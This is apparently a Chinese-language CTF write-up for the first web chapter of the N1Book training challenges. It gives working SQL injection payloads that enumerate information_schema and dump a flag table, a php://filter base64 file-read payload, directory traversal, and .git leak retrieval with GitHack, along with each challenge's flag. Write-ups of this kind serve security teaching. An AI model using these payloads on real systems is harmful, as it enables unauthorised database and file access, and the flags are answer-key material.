目录
[第一章 web入门]常见的搜集1
敏感文件泄漏使用工具进行目录扫描
访问得到一个txt文件的路径,访问得到半个flag
访问index.php~得到flag2
访问.index.php.swp使用记事本打开得到flag3拼接起来就可以了
flag=n1book{info_1s_v3ry_imp0rtant_hack}
[第一章 web入门]粗心的小李1
使用GitHack工具进行访问下载index.html文件
Githack下载:GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit
在本地访问index.html得到flag
flag=n1book{git_looks_s0_easyfun}
[第一章 web入门]SQL注入-1
使用‘进行测试注入类型,发现有回显得知是字符型注入
在使用order by进行测试字段长度
id=1' order by 3 --+
输入3产生回显,4没有回显 证明字段数为三位
使用联合语句进行查询数据库
id=-1' union select 1,databse(),3 --+
得到数据库名note,进行查询数据表
?id=-1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = database()--+
发现flag字样的表进行查询表内的字段
?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name = 'fl4g'--+
得到flag字段,进行查询字段值
?id=-1'union select 1,database(),group_concat(fllllag) from note.fl4g--+
得到flag
flag= n1book{union_select_is_so_cool}
[第一章 web入门]afr_1
使用php伪协议进行文件读取
?p=php://filter/read=convert.base64-encode/resource=flag
进行base64解码得到flag
flag=n1book{afr_1_solved}
[第一章 web入门]afr_2
f12查看源码,有个img目录
进行目录穿越../得到根目录,得到flag
flag=n1book{afr_2_solved}
考察知识点:
1.常见的备份文件,目录扫描
2.git文件泄漏和GitHack工具的使用
3.sql手工注入,联合查询
4.php伪协议的使用,目录穿越